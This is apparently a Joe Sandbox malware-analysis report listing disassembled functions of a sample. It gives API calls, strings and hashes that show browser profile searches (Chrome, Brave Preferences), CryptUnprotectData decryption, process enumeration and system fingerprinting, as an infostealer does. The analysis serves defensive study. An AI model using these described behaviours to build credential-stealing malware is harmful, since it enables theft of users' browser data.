Opcode ID: 4a1a44a5959dc9b82b61be8d89ed438f48614dbf2bf761535620a69525459399
Instruction ID: 56f1237c2d7c520c90c98f1ce5fb3a6d9b51b415e2d0c2f733ce4a2014328567
Opcode Fuzzy Hash: 4a1a44a5959dc9b82b61be8d89ed438f48614dbf2bf761535620a69525459399
Instruction Fuzzy Hash: AE9172B19006189BDB24EFA4DC85FEA737DBF88300F044589F61A92191DB789AC5CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040B610 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,0041D71A,0041D717,00000000,?,?,?,0041DB54,0041D716), ref: 0040B695
StrCmpCA.SHLWAPI(?,0041DB58), ref: 0040B6ED
StrCmpCA.SHLWAPI(?,0041DB5C), ref: 0040B703
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040BF3B
FindClose.KERNEL32(000000FF), ref: 0040BF4D

Strings

Google Chrome, xrefs: 0040BDB9
Brave, xrefs: 0040B8A2
Preferences, xrefs: 0040B8BE
\Brave\Preferences, xrefs: 0040B97B

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 217fbc089ea81eaa224ec90d0f64b3e91da9f160fea060791b47bc177b42c4e3
Instruction ID: 76d401781d3fce7c968e745dc043d6a6225f477281f2400f678919b217ba5a4c
Opcode Fuzzy Hash: 217fbc089ea81eaa224ec90d0f64b3e91da9f160fea060791b47bc177b42c4e3
Instruction Fuzzy Hash: 0F423572A0010457CF14FB61DC56EEE773DAF84304F41455EF90AA6181EE38AB89CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 6BA535A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6BADF688,00001000), ref: 6BA535D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6BA535E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6BA535FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6BA5363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6BA5369F
__aulldiv.LIBCMT ref: 6BA536E4
QueryPerformanceCounter.KERNEL32(?), ref: 6BA53773
EnterCriticalSection.KERNEL32(6BADF688), ref: 6BA5377E
LeaveCriticalSection.KERNEL32(6BADF688), ref: 6BA537BD
QueryPerformanceCounter.KERNEL32(?), ref: 6BA537C4
EnterCriticalSection.KERNEL32(6BADF688), ref: 6BA537CB
LeaveCriticalSection.KERNEL32(6BADF688), ref: 6BA53801
__aulldiv.LIBCMT ref: 6BA53883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6BA53902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6BA53918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6BA5394C

Strings

GTC, xrefs: 6BA53912
MOZ_TIMESTAMP_MODE, xrefs: 6BA535DB
GenuntelineI, xrefs: 6BA53639
QPC, xrefs: 6BA538FC
AuthcAMDenti, xrefs: 6BA53946

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: b2d6c757d61ba54b5f1f4e6e3b6ad93fe7e074bb425fe892318644b8e5793556
Instruction ID: f27bc089488438112491427b1981a3b1555f114a56c1ecc0ce6ae56933d75d23
Opcode Fuzzy Hash: b2d6c757d61ba54b5f1f4e6e3b6ad93fe7e074bb425fe892318644b8e5793556
Instruction Fuzzy Hash: E5B193B2A083509FDF18CF28C85465AB7E5FBCA700F04C92EE899D3790D775D9428B51

Uniqueness

Uniqueness Score: -1.00%

Function 00412570 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00412589
FindFirstFileA.KERNEL32(?,?), ref: 004125A0
StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
FindClose.KERNEL32(000000FF), ref: 004127CE

Strings

%s\%s, xrefs: 004125FE
%s\%s, xrefs: 0041264F
%s\*, xrefs: 0041257D

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: cfff7e71d02b1736ab1f1f7c997ebdcc83a84c1d4f68987a5e2369cfcdad3dbb
Instruction ID: 16fd5a9597efbfb91ed0225017393bb16e0f77851f83799e5682f8bc7922baf0
Opcode Fuzzy Hash: cfff7e71d02b1736ab1f1f7c997ebdcc83a84c1d4f68987a5e2369cfcdad3dbb
Instruction Fuzzy Hash: 676156B2900618ABCB24EBE0DD99EEA737DBF58701F00458DB61A96140EF74DB85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00411B80 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00411B9D
FindFirstFileA.KERNEL32(?,?), ref: 00411BB4
StrCmpCA.SHLWAPI(?,0041D834), ref: 00411BE2
StrCmpCA.SHLWAPI(?,0041D838), ref: 00411BF8
FindNextFileA.KERNEL32(000000FF,?), ref: 00411D3D
FindClose.KERNEL32(000000FF), ref: 00411D52

Strings

%s\%s, xrefs: 00411B91

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 6a840e30490d0d08afdc1253b2c36dc6dcc5f64356898c57fcf5146ff498d072
Instruction ID: 1beca0db89a34a7d9f561fb59a57ff38f1a0216f2a844ef05cbde65d1a44dc5a
Opcode Fuzzy Hash: 6a840e30490d0d08afdc1253b2c36dc6dcc5f64356898c57fcf5146ff498d072
Instruction Fuzzy Hash: D75168B5900618ABCB24EBB0DC85EEA737DBB48304F40458DB65A96050EB79ABC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004015C0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215C4,?,00401E03,?,004215C8,?,?,00000000,?,00000000), ref: 00401813
StrCmpCA.SHLWAPI(?,004215CC), ref: 00401863
StrCmpCA.SHLWAPI(?,004215D0), ref: 00401879
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401C30
DeleteFileA.KERNEL32(00000000), ref: 00401CB4
FindNextFileA.KERNEL32(000000FF,?), ref: 00401D0A
FindClose.KERNEL32(000000FF), ref: 00401D1C

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Strings

\*.*, xrefs: 004016E1

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: f4763ada7c031ff38536aef9cb867afa4938067a9319c6e9b980bcd3ea4aaa06
Instruction ID: 3aa4ae790513c502dab12fd0122e5550b13815c0fff8c800b600eb4522263f51
Opcode Fuzzy Hash: f4763ada7c031ff38536aef9cb867afa4938067a9319c6e9b980bcd3ea4aaa06
Instruction Fuzzy Hash: D41225759102189BCB15FB61DC56EEE7739AF54308F41419EB10A62091EF38AFC9CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1C0 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0041DC10,0041D73F), ref: 0040D22B
StrCmpCA.SHLWAPI(?,0041DC14), ref: 0040D273
StrCmpCA.SHLWAPI(?,0041DC18), ref: 0040D289
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040D4EE
FindClose.KERNEL32(000000FF), ref: 0040D500

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: b40c84206ab88950c8bc1da80f20c02468e8b1956029bad3f7442f400096f154
Instruction ID: a7e743a2a4f5118c59e4eb5b7e6cabc454f6fbff0e67e47d23a58287cf68124a
Opcode Fuzzy Hash: b40c84206ab88950c8bc1da80f20c02468e8b1956029bad3f7442f400096f154
Instruction Fuzzy Hash: 63913B72A0020497CB14FFB1EC569EE777DAB84308F41466EF90A96581EE38D788CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00414570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
LocalFree.KERNEL32(00000000), ref: 004146DF

Strings

/ , xrefs: 0041463C

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: f7e689532fcb6c20cb78a89c4a24d6f915bfb465a8112885e31d740b2fc4d9cf
Instruction ID: e4a09482d03fe0ac07b2aa12fe49ef9b635f824a972481fa3f662a7a2871ed61
Opcode Fuzzy Hash: f7e689532fcb6c20cb78a89c4a24d6f915bfb465a8112885e31d740b2fc4d9cf
Instruction Fuzzy Hash: D5413B74940218ABCB24DF50DC89BEDB775BB54308F2042DAE10A66191DB786FC5CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB60 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,0041D74E), ref: 0040DBD2
StrCmpCA.SHLWAPI(?,0041DC58), ref: 0040DC22
StrCmpCA.SHLWAPI(?,0041DC5C), ref: 0040DC38
FindNextFileA.KERNEL32(000000FF,?), ref: 0040E306

Strings

\*.*, xrefs: 0040DB7D

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: b704405470cac820e6730755b1db4dd3b53a4f97c5af91ab5e7e42f18d6cbca2
Instruction ID: 8f23b39e961a58df861ec407c7814dc8b58ae9c3eb94c511c30fb23e96a564a4
Opcode Fuzzy Hash: b704405470cac820e6730755b1db4dd3b53a4f97c5af91ab5e7e42f18d6cbca2
Instruction Fuzzy Hash: 88126771A002145ACB14FB61DC56EED7739AF54308F4142AEB50A66091EF389FC8CFE8

Uniqueness

Uniqueness Score: -1.00%

Function 004155A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0

Strings

>N@, xrefs: 004155B8, 00415614, 004155BB, 00415617

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID: >N@
API String ID: 80407269-3381801619
Opcode ID: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
Instruction ID: 37622f5e64546725dbf22d4b9568f407ee9b467eb6af981ec2fff7c5b56759cd
Opcode Fuzzy Hash: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
Instruction Fuzzy Hash: 73110D74200A04FFDB10CFA4E844FEB37AABF89310F509549F9098B254D775E881DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415D00 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415D1E
Process32First.KERNEL32(0041D599,00000128), ref: 00415D32
Process32Next.KERNEL32(0041D599,00000128), ref: 00415D47
StrCmpCA.SHLWAPI(?,00000000), ref: 00415D5C
CloseHandle.KERNEL32(0041D599), ref: 00415D7A

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
Instruction ID: 4a4bbd9776da2ad99231b6c5471aa9e11f786ff18f9e7f574f496e4dc08d41d8
Opcode Fuzzy Hash: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
Instruction Fuzzy Hash: 53012575A00608EBDB24DF94DD58BDEB7B9BF88304F108189E90597250DB749B81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 004144B0 Relevance: 6.0, APIs: 4, Instructions: 32memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,04076A38,00000000,?,0041D758,00000000,?,00000000,00000000,?,04077130,00000000), ref: 004144C0
HeapAlloc.KERNEL32(00000000), ref: 004144C7
GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
wsprintfA.USER32 ref: 00414514

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
Instruction ID: 63b956e3650aea0bdd01ac085b80a838c67200ff8d98e36f2a49cf33a9f6a1bd
Opcode Fuzzy Hash: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
Instruction Fuzzy Hash: C7F06770E047289BDB309B64DD49FA9737ABB44311F0002D5EA0AE3291DB749E858F97

Uniqueness

Uniqueness Score: -1.00%

Function 00409540 Relevance: 4.5, APIs: 3, Instructions: 49memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
LocalFree.KERNEL32(?), ref: 004095AF

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
Instruction ID: 845aa5354f8c35be15d3c308e338542aeef751caf2e905b87ee6994bb5fcaacd
Opcode Fuzzy Hash: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
Instruction Fuzzy Hash: 2B11B7B8A00609EFCB04DF94C984AAEB7B5FF88301F104559E915A7390D774AE51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 004143C0 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00401177,04070898,004136EB,0041D6E3), ref: 004143CD
HeapAlloc.KERNEL32(00000000), ref: 004143D4
GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
Instruction ID: fd22aaf49eebc4deedfa71bce2fb200d05227bfc9b63873cd8cb515d50d954e6
Opcode Fuzzy Hash: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
Instruction Fuzzy Hash: 2CE08CB490070CFFCB20EFE4DC49E9CBBB8AB08312F000184FA09E3280DB7056848B91

Uniqueness

Uniqueness Score: -1.00%

Function 00401120 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
ExitProcess.KERNEL32 ref: 0040113E

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
Instruction ID: 30efb513975bfe185fa80fb3a8f84b393628ccfbb0aa9170a1b214bc368b0093
Opcode Fuzzy Hash: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
Instruction Fuzzy Hash: B6D05E7490020C8BCB14DFE09A496DDBBB9AB8D711F001455DD0572240DA305441CA65

Uniqueness

Uniqueness Score: -1.00%

Function 004070E0 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,00413068,?), ref: 004070F4
RtlAllocateHeap.NTDLL(00000000,?,00413068,?), ref: 004070FB
lstrcat.KERNEL32(?,040738A0), ref: 004072AB
lstrcat.KERNEL32(?,?), ref: 004072BF
lstrcat.KERNEL32(?,?), ref: 004072D3
lstrcat.KERNEL32(?,?), ref: 004072E7
lstrcat.KERNEL32(?,04076A68), ref: 004072FB
lstrcat.KERNEL32(?,04076BA0), ref: 0040730F
lstrcat.KERNEL32(?,04078238), ref: 00407322
lstrcat.KERNEL32(?,04078328), ref: 00407336
lstrcat.KERNEL32(?,04073928), ref: 0040734A
lstrcat.KERNEL32(?,?), ref: 0040735E
lstrcat.KERNEL32(?,?), ref: 00407372
lstrcat.KERNEL32(?,?), ref: 00407386
lstrcat.KERNEL32(?,04076A68), ref: 00407399
lstrcat.KERNEL32(?,04076BA0), ref: 004073AD
lstrcat.KERNEL32(?,04078238), ref: 004073C1
lstrcat.KERNEL32(?,04078328), ref: 004073D4
lstrcat.KERNEL32(?,04078050), ref: 004073E8
lstrcat.KERNEL32(?,?), ref: 004073FC
lstrcat.KERNEL32(?,?), ref: 00407410
lstrcat.KERNEL32(?,?), ref: 00407424
lstrcat.KERNEL32(?,04076A68), ref: 00407438
lstrcat.KERNEL32(?,04076BA0), ref: 0040744B
lstrcat.KERNEL32(?,04078238), ref: 0040745F
